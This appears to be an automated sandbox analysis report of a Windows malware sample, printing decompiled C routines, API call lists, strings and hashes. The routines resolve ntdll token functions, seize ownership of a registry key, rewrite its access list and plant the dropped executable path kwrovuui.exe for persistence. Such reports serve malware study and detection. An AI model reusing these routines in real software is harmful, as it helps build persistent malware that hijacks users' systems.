											_t26 =  *0x413918; // 0x0
											_t35 = 0xfffffffa;
											_t11 = GetProcAddress(_t26, "NtSetInformationThread");
											 *0x413930 = _t11;
											if(_t11 == 0) {
												goto L34;
											} else {
												_t31 =  *0x413918; // 0x0
												_t35 = 0xfffffff9;
												_t12 = GetProcAddress(_t31, "NtSetInformationToken");
												 *0x413934 = _t12;
												if(_t12 == 0) {
													goto L34;
												} else {
													_t13 =  *0x413918; // 0x0
													_t35 = 0xfffffff8;
													_t14 = GetProcAddress(_t13, "RtlNtStatusToDosError");
													 *0x413938 = _t14;
													if(_t14 == 0) {
														goto L34;
													} else {
														_t27 =  *0x413918; // 0x0
														_t35 = 0xfffffff7;
														_t15 = GetProcAddress(_t27, "NtClose");
														 *0x41393c = _t15;
														if(_t15 == 0) {
															goto L34;
														} else {
															_t32 =  *0x413918; // 0x0
															_t35 = 0xfffffff6;
															_t16 = GetProcAddress(_t32, "NtOpenProcessToken");
															 *0x413940 = _t16;
															if(_t16 == 0) {
																goto L34;
															} else {
																_t17 =  *0x413918; // 0x0
																_t35 = 0xfffffff5;
																_t18 = GetProcAddress(_t17, "NtDuplicateToken");
																 *0x413944 = _t18;
																if(_t18 == 0) {
																	goto L34;
																} else {
																	_t28 =  *0x413918; // 0x0
																	_t35 = 0xfffffff4;
																	_t19 = GetProcAddress(_t28, "RtlAllocateAndInitializeSid");
																	 *0x413948 = _t19;
																	if(_t19 == 0) {
																		goto L34;
																	} else {
																		_t33 =  *0x413918; // 0x0
																		_t35 = 0xfffffff3;
																		_t20 = GetProcAddress(_t33, "NtFilterToken");
																		 *0x41394c = _t20;
																		if(_t20 == 0) {
																			goto L34;
																		} else {
																			_t21 =  *0x413918; // 0x0
																			_t35 = 0xfffffff2;
																			_t22 = GetProcAddress(_t21, "RtlLengthSid");
																			 *0x413950 = _t22;
																			if(_t22 == 0) {
																				goto L34;
																			} else {
																				_t29 =  *0x413918; // 0x0
																				_t35 = 0xfffffff1;
																				_t23 = GetProcAddress(_t29, "NtQueryInformationToken");
																				 *0x413954 = _t23;
																				_t1 = _t35 + 0x10; // 0x100000001
																				_t4 = _t1;
																				if(_t23 == 0) {
																					goto L34;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						return _t4;
					} else {
						return 1;
					}
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x413918 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}

0x00401000
0x00401006
0x0040100b
0x00401023
0x0040102a
0x004010c2
0x004010c4
0x004010cb
0x0040127b
0x0040127b
0x004010d1
0x004010d1
0x004010dc
0x004010e1
0x004010e3
0x004010ea
0x00000000
0x004010f0
0x004010f0
0x004010fc
0x00401101
0x00401103
0x0040110a
0x00000000
0x00401110
0x00401110
0x0040111c
0x00401121
0x00401123
0x0040112a
0x00000000
0x00401130
0x00401130
0x0040113b
0x00401140
0x00401142
0x00401149
0x00000000
0x0040114f
0x0040114f
0x0040115b
0x00401160
0x00401162
0x00401169
0x00000000
0x0040116f
0x0040116f
0x0040117b
0x00401180
0x00401182
0x00401189
0x00000000
0x0040118f
0x0040118f
0x0040119a
0x0040119f
0x004011a1
0x004011a8
0x00000000
0x004011ae
0x004011ae
0x004011ba
0x004011bf
0x004011c1
0x004011c8
0x00000000
0x004011ce
0x004011ce
0x004011da
0x004011df
0x004011e1
0x004011e8
0x00000000
0x004011ee
0x004011ee
0x004011f9
0x004011fe
0x00401200
0x00401207
0x00000000
0x00401209
0x00401209
0x00401215
0x0040121a
0x0040121c
0x00401223
0x00000000
0x00401225
0x00401225
0x00401231
0x00401236
0x00401238
0x0040123f
0x00000000
0x00401241
0x00401241
0x0040124c
0x00401251
0x00401253
0x0040125a
0x00000000
0x0040125c
0x0040125c
0x00401268
0x0040126d
0x0040126f
0x00401276
0x00401276
0x00401279
0x00000000
0x00000000
0x00401279
0x0040125a
0x0040123f
0x00401223
0x00401207
0x004011e8
0x004011c8
0x004011a8
0x00401189
0x00401169
0x00401149
0x0040112a
0x0040110a
0x004010ea
0x0040127f
0x004010ae
0x004010b4
0x004010b4
0x0040100d
0x00401012
0x00401018
0x0040101f
0x00000000
0x00401022
0x00401022
0x00401022
0x0040101f

APIs

LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U,00000000,00000000,00401839,00409646), ref: 004010C2
GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 004010E1
GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 00401101
GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 00401121
GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00401140
GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 00401160
GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 00401180
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040119F
GetProcAddress.KERNEL32(00000000,NtClose), ref: 004011BF
GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 004011DF
GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 004011FE
GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 0040121A

Strings

RtlFreeSid, xrefs: 00401116
NtFilterToken, xrefs: 0040122B
RtlSetLastWin32Error, xrefs: 004010D6
RtlExpandEnvironmentStrings_U, xrefs: 004010BC
RtlLengthSid, xrefs: 00401246
NtSetInformationToken, xrefs: 00401175
NtClose, xrefs: 004011B4
NtOpenProcessToken, xrefs: 004011D4
ntdll.dll, xrefs: 0040100D
RtlInitUnicodeString, xrefs: 00401135
NtSetInformationThread, xrefs: 00401155
NtQueryInformationToken, xrefs: 00401262
NtTerminateProcess, xrefs: 004010F6
RtlNtStatusToDosError, xrefs: 00401194
NtDuplicateToken, xrefs: 004011F3
RtlAllocateAndInitializeSid, xrefs: 0040120F

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
API String ID: 2238633743-3228201535
Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B211, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 131
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				CHAR* _v32;
				CHAR* _v36;
				CHAR* _v40;
				CHAR* _v44;
				CHAR* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				CHAR* _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				CHAR* _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				CHAR* _v104;
				struct _TIME_ZONE_INFORMATION _v276;
				long _t77;
				signed int _t80;
				signed int _t93;
				signed int _t101;
				signed int _t102;
				CHAR* _t103;
				signed int _t104;
				signed short _t106;
				signed short _t109;
				signed int _t114;
				signed int _t115;
				void* _t117;

				_v56 = "Sun";
				_v52 = "Mon";
				_v48 = "Tue";
				_v44 = "Wed";
				_v40 = "Thu";
				_v36 = "Fri";
				_v32 = "Sat";
				_v104 = "Jan";
				_v100 = "Feb";
				_v96 = "Mar";
				_v92 = "Apr";
				_v88 = "May";
				_v84 = "Jun";
				_v80 = "Jul";
				_v76 = "Aug";
				_v72 = "Sep";
				_v68 = "Oct";
				_v64 = "Nov";
				_v60 = "Dec";
				if(_a4 != 0) {
					FileTimeToLocalFileTime(_a4,  &_v12);
					FileTimeToSystemTime( &_v12,  &_v28);
				} else {
					GetLocalTime( &_v28);
				}
				_t114 = _a12;
				if(_t114 != 0) {
					SystemTimeToFileTime( &_v28,  &_v12);
					_t93 = E0040ECA5();
					if(_t114 <= 0) {
						_t104 = _t93 %  ~_t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
						asm("sbb [ebp-0x4], ebx");
					} else {
						_t104 = _t93 % _t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
						asm("adc [ebp-0x4], ebx");
					}
					FileTimeToSystemTime( &_v12,  &_v28);
				}
				_v276.Bias = 0;
				_t77 = GetTimeZoneInformation( &_v276);
				_t101 = _v276.Bias;
				if(_t77 == 2) {
					_t101 = _t101 + _v276.DaylightBias;
				}
				_t102 =  ~_t101;
				asm("cdq");
				_t80 = (_t102 ^ _t104) - _t104;
				if(_v28.wDayOfWeek > 6) {
					_t109 = 6;
					_v28.wDayOfWeek = _t109;
				}
				if(_v28.wMonth == 0) {
					_v28.wMonth = 1;
				}
				if(_v28.wMonth > 0xc) {
					_t106 = 0xc;
					_v28.wMonth = _t106;
				}
				_t103 = "+";
				if(_t102 < 0) {
					_t103 = "-";
				}
				_t115 = 0x3c;
				asm("cdq");
				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
			}

APIs

GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
wsprintfA.USER32 ref: 0040B3B7

Strings

Jun, xrefs: 0040B279
Thu, xrefs: 0040B241
Sat, xrefs: 0040B24F
Jan, xrefs: 0040B256
Wed, xrefs: 0040B23A
Sep, xrefs: 0040B28E
Tue, xrefs: 0040B233
May, xrefs: 0040B272
%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u, xrefs: 0040B3AF
Aug, xrefs: 0040B287
Mon, xrefs: 0040B22C
Dec, xrefs: 0040B2A3
Oct, xrefs: 0040B295
Mar, xrefs: 0040B264
Feb, xrefs: 0040B25D
Nov, xrefs: 0040B29C
Fri, xrefs: 0040B248
Jul, xrefs: 0040B280
Apr, xrefs: 0040B26B
Sun, xrefs: 0040B225

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time$File$System$Local$InformationZonewsprintf
String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
API String ID: 766114626-2976066047
Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00407A95, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E00407A95(void* _a4, char* _a8, signed int _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				struct _ACL* _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				int _v64;
				void _v132;
				char _v388;
				char _v516;
				struct _SECURITY_DESCRIPTOR _v1540;
				void* _t95;
				void* _t104;
				void* _t107;
				void* _t111;
				void* _t116;
				struct _ACL* _t117;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t123;
				void* _t125;
				char* _t126;
				void* _t130;
				void* _t134;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t146;
				int _t148;
				int _t151;
				char* _t158;
				void** _t159;
				void* _t161;
				void* _t164;
				signed int _t172;
				void* _t173;
				char* _t174;
				void* _t175;
				void* _t176;

				_v32 = 0;
				_v12 = 0;
				_v28 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28) != 0) {
					return 0;
				}
				_v40 = 0x80;
				_t95 = GetUserNameA( &_v388,  &_v40);
				__eflags = _t95;
				if(_t95 == 0) {
					L48:
					RegCloseKey(_v28);
					return _v12;
				} else {
					_v36 = 0x44;
					_v44 = 0x80;
					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
					__eflags = _t104;
					if(_t104 == 0) {
						goto L48;
					}
					_v48 = 0x400;
					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
					__eflags = _t107;
					if(_t107 != 0) {
						goto L48;
					}
					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
					__eflags = _t111;
					if(_t111 == 0) {
						L12:
						_v24 = 0;
						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
						__eflags = _t116;
						if(_t116 == 0) {
							L47:
							goto L48;
						}
						_t117 = _v32;
						__eflags = _t117;
						if(_t117 == 0) {
							goto L47;
						}
						_t164 = 0;
						_v8 = 0;
						__eflags = 0 - _t117->AceCount;
						if(0 >= _t117->AceCount) {
							goto L47;
						} else {
							goto L15;
						}
						do {
							L15:
							_t118 = GetAce(_t117, _v8,  &_v20);
							__eflags = _t118;
							if(_t118 == 0) {
								L31:
								_t73 =  &_v8;
								 *_t73 = _v8 + 1;
								__eflags =  *_t73;
								goto L32;
							}
							_t172 = 0;
							_v16 = _v20 + 8;
							__eflags = _t164;
							if(_t164 <= 0) {
								L21:
								__eflags = _t164 - 0x20;
								if(_t164 < 0x20) {
									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
									_t164 = _t164 + 1;
									__eflags = _t164;
								}
								_t134 = EqualSid( &_v132, _v16);
								_t159 = _v20;
								__eflags = _t134;
								if(_t134 == 0) {
									_t135 = 0x20000;
								} else {
									asm("sbb eax, eax");
									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
								}
								__eflags = _t159[1] - _t135;
								if(_t159[1] != _t135) {
									_t159[1] = _t135;
									_t159 = _v20;
									_v24 = 1;
								}
								__eflags =  *_t159;
								if( *_t159 != 0) {
									L30:
									 *_t159 = 0;
									_t136 = _v16;
									__eflags =  *(_t136 + 8);
									_t68 =  *(_t136 + 8) == 0;
									__eflags = _t68;
									_v24 = 1;
									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
									goto L31;
								} else {
									__eflags = _t159[0] & 0x00000010;
									if((_t159[0] & 0x00000010) == 0) {
										goto L31;
									}
									goto L30;
								}
							} else {
								goto L17;
							}
							while(1) {
								L17:
								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
								__eflags = _t143;
								if(_t143 != 0) {
									break;
								}
								_t172 = _t172 + 1;
								__eflags = _t172 - _t164;
								if(_t172 < _t164) {
									continue;
								}
								break;
							}
							__eflags = _t172 - _t164;
							if(_t172 >= _t164) {
								goto L21;
							}
							DeleteAce(_v32, _v8);
							_v24 = 1;
							L32:
							_t117 = _v32;
							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
						} while (_v8 < (_t117->AceCount & 0x0000ffff));
						__eflags = _v24;
						if(_v24 == 0) {
							goto L47;
						}
						__eflags = "C:\\Windows\\SysWOW64\\mmeemcze\\kwrovuui.exe"; // 0x43
						if(__eflags == 0) {
							L41:
							_v12 = 1;
							_t173 = LocalAlloc(0x40, 0x14);
							__eflags = _t173;
							if(_t173 != 0) {
								_t120 = InitializeSecurityDescriptor(_t173, 1);
								__eflags = _t120;
								if(_t120 != 0) {
									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										_t123 = RegSetKeySecurity(_v28, 4, _t173);
										__eflags = _t123;
										if(_t123 == 0) {
											_v12 = 1;
										}
									}
								}
								LocalFree(_t173);
							}
							goto L47;
						}
						__eflags =  *0x412cc0; // 0x1
						if(__eflags == 0) {
							goto L41;
						}
						_v12 = 0;
						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12);
						__eflags = _t125;
						if(_t125 != 0) {
							goto L41;
						}
						_t158 = "C:\\Windows\\SysWOW64\\mmeemcze\\kwrovuui.exe";
						_t126 = _t158;
						_t174 =  &(_t126[1]);
						do {
							_t161 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t161;
						} while (_t161 != 0);
						_t130 = RegSetValueExA(_v12, E00402544(0x4122f8, 0x4106dc, 0xa, 0xe4, 0xc8), 0, 2, _t158, _t126 - _t174 + 1);
						__eflags = _t130;
						if(_t130 == 0) {
							 *0x412cc0 = 0;
						}
						goto L41;
					}
					_t146 = EqualSid( &_v132, _v16);
					__eflags = _t146;
					if(_t146 != 0) {
						goto L12;
					}
					_v12 = 1;
					_t175 = LocalAlloc(0x40, 0x14);
					__eflags = _t175;
					if(_t175 != 0) {
						_t148 = InitializeSecurityDescriptor(_t175, 1);
						__eflags = _t148;
						if(_t148 != 0) {
							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
							__eflags = _t151;
							if(_t151 != 0) {
								RegSetKeySecurity(_v28, 1, _t175);
							}
						}
						LocalFree(_t175);
					}
					goto L12;
				}
			}

0x00407aae
0x00407ab4
0x00407ab7
0x00407ac2
0x00000000
0x00407ac4
0x00407adc
0x00407adf
0x00407ae5
0x00407ae7
0x00407da7
0x00407daa
0x00000000
0x00407aed
0x00407b0c
0x00407b13
0x00407b16
0x00407b1c
0x00407b1e
0x00000000
0x00000000
0x00407b34
0x00407b3b
0x00407b41
0x00407b43
0x00000000
0x00000000
0x00407b59
0x00407b5f
0x00407b61
0x00407bb8
0x00407bcb
0x00407bce
0x00407bd4
0x00407bd6
0x00407da6
0x00000000
0x00407da6
0x00407bdc
0x00407bdf
0x00407be1
0x00000000
0x00000000
0x00407be9
0x00407beb
0x00407bee
0x00407bf2
0x00000000
0x00000000
0x00000000
0x00000000
0x00407bf8
0x00407bf8
0x00407c00
0x00407c06
0x00407c08
0x00407cc6
0x00407cc6
0x00407cc6
0x00407cc6
0x00000000
0x00407cc6
0x00407c14
0x00407c16
0x00407c19
0x00407c1b
0x00407c4f
0x00407c4f
0x00407c52
0x00407c57
0x00407c5e
0x00407c5e
0x00407c5e
0x00407c66
0x00407c6c
0x00407c6f
0x00407c71
0x00407c86
0x00407c73
0x00407c78
0x00407c7f
0x00407c7f
0x00407c8b
0x00407c8e
0x00407c90
0x00407c93
0x00407c96
0x00407c96
0x00407c9d
0x00407c9f
0x00407ca7
0x00407ca7
0x00407ca9
0x00407cac
0x00407cb2
0x00407cb2
0x00407cb5
0x00407cc3
0x00000000
0x00407ca1
0x00407ca1
0x00407ca5
0x00000000
0x00000000
0x00000000
0x00407ca5
0x00000000
0x00000000
0x00000000
0x00407c1d
0x00407c1d
0x00407c27
0x00407c2d
0x00407c2f
0x00000000
0x00000000
0x00407c31
0x00407c32
0x00407c34
0x00000000
0x00000000
0x00000000
0x00407c34
0x00407c36
0x00407c38
0x00000000
0x00000000
0x00407c40
0x00407c46
0x00407cc9
0x00407cc9
0x00407cd0
0x00407cd0
0x00407cd9
0x00407cdc
0x00000000
0x00000000
0x00407ce2
0x00407ce8
0x00407d5a
0x00407d61
0x00407d6a
0x00407d6c
0x00407d6e
0x00407d72
0x00407d78
0x00407d7a
0x00407d82
0x00407d88
0x00407d8a
0x00407d92
0x00407d98
0x00407d9a
0x00407d9c
0x00407d9c
0x00407d9a
0x00407d8a
0x00407da0
0x00407da0
0x00000000
0x00407d6e
0x00407cea
0x00407cf0
0x00000000
0x00000000
0x00407cff
0x00407d05
0x00407d0b
0x00407d0d
0x00000000
0x00000000
0x00407d0f
0x00407d14
0x00407d16
0x00407d19
0x00407d19
0x00407d1b
0x00407d1c
0x00407d1c
0x00407d4a
0x00407d50
0x00407d52
0x00407d54
0x00407d54
0x00000000
0x00407d52
0x00407b6a
0x00407b70
0x00407b72
0x00000000
0x00000000
0x00407b7b
0x00407b84
0x00407b86
0x00407b88
0x00407b8c
0x00407b92
0x00407b94
0x00407b9c
0x00407ba2
0x00407ba4
0x00407bab
0x00407bab
0x00407ba4
0x00407bb2
0x00407bb2
0x00000000
0x00407b88

APIs

RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,?,?), ref: 00407B16
RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
LocalFree.KERNEL32(00000000), ref: 00407BB2
GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE

Strings

D, xrefs: 00407B0C
C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe, xrefs: 00407CE2, 00407D0F, 00407D23, 00407D24

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
String ID: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe$D
API String ID: 2976863881-1909627816
Opcode ID: 8226ce41931dc07f2dac1faf390fa1230816c73ff31e8f8cc36009fb0dc3a3d9
Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
Opcode Fuzzy Hash: 8226ce41931dc07f2dac1faf390fa1230816c73ff31e8f8cc36009fb0dc3a3d9
Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 02167CE5, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,000E0100,?), ref: 02167D0A
GetUserNameA.ADVAPI32(?,?), ref: 02167D2F
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02167D66
RegGetKeySecurity.ADVAPI32(?,00000005,?,?), ref: 02167D8B
GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02167DA9
EqualSid.ADVAPI32(?,?), ref: 02167DBA
LocalAlloc.KERNEL32(00000040,00000014), ref: 02167DCE
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02167DDC
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02167DEC
RegSetKeySecurity.ADVAPI32(?,00000001,00000000), ref: 02167DFB
LocalFree.KERNEL32(00000000), ref: 02167E02
GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02167E1E

Strings

C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe, xrefs: 02167F32, 02167F5F, 02167F73, 02167F74
D, xrefs: 02167D5C

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
String ID: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe$D
API String ID: 2976863881-1909627816
Opcode ID: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
Instruction ID: 23521634c8295ca848ac4cce0669f6249eec345d75510d57bb666d25d6c7050b
Opcode Fuzzy Hash: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
Instruction Fuzzy Hash: 6BA16071940209AFDB119FA4DC48FFEBBB9FB08308F148069F515E6190EB758A96CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00406511, Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00406511(void* __ecx) {
				signed int _t75;
				signed int _t76;
				int _t78;
				void* _t83;
				signed int _t93;
				void* _t95;
				signed int _t99;
				int _t101;
				int _t115;
				int _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t122;
				intOrPtr _t135;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				void* _t144;
				void* _t152;

				_t122 = __ecx;
				_t139 = _t141 - 0x74;
				_t75 =  *(_t139 + 0x7c);
				_t135 =  *((intOrPtr*)(_t75 + 4));
				_t76 =  *_t75;
				 *(_t139 + 0x7c) = _t76;
				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x5e, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
				_t143 = _t141 - 0x90c + 0x1c;
				_t117 = _t78;
				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
					E0040E318();
					ExitProcess(0);
				}
				_t83 =  *( *(_t139 + 0x7c) + 0xc);
				__imp__#8( *((intOrPtr*)(_t83 + 4)), E00406511);
				__imp__#8();
				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
				E0040EE2A(_t122, _t139 - 0x98, 0, 0x108);
				_t144 = _t143 + 0x48;
				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
				_t93 = 3;
				_push(0);
				_push(0);
				 *(_t139 - 0x8c) = _t93;
				 *((intOrPtr*)(_t139 - 0x94)) = 0;
				_push(0);
				 *(_t139 - 0x5c) = _t93;
				_push(0);
				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
				 *((intOrPtr*)(_t139 - 0x64)) = 0;
				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
				 *(_t139 - 0x6c) = _t93;
				 *(_t139 + 0x7c) = _t93;
				_push(_t135);
				_push(_t139 - 0x98);
				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
				 *((intOrPtr*)(_t139 - 0x74)) = 0;
				_push(0);
				while(1) {
					_t95 = GetCurrentProcess();
					__imp__StackWalk64(0x14c, _t95);
					if(_t95 == 0) {
						break;
					}
					_t95 = 0;
					if( *(_t139 + 0x7c) != 0) {
						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
							_t144 = _t144 + 0x1c;
							_t119 = _t119 + _t115;
							_t95 = 0;
						}
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t135);
						_push(_t139 - 0x98);
						_push(_t95);
						continue;
					}
					break;
				}
				 *(_t139 + 0x7c) = _t95;
